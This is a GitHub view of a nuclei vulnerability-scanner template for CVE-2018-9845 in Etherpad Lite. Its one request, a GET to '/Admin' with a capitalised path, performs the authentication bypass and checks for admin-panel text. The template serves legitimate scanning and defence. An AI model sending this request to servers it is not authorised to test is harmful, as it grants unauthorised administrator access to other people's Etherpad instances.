nuclei-templates/cves/2018/CVE-2018–9845.yaml

37 lines
928 B
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-20189845
info:
name: Etherpad Lite before 1.6.4 is exploitable for admin access.
author: philippedelteil
severity: critical
reference:
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b
- https://nvd.nist.gov/vuln/detail/CVE-2018-9845
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-9845
tags: cve,cve2018,etherpad,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/Admin"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Etherpad version"
- "Plugin manager"
- "Installed parts"
condition: and
- type: status
status:
- 200